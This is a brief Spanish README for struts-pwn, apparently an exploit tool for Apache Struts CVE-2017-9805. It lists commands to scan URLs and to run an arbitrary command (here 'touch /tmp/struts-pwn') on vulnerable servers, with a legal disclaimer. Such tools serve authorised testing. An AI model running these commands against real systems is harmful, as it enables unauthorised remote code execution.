
Un exploit para Apache Struts CVE-2017-9805
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

Este proyecto se realiza únicamente con fines educativos y de pruebas éticas. El uso de struts-pwn para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún uso indebido o daño causado por este programa.
El proyecto está licenciado bajo la Licencia MIT.
Mazin Ahmed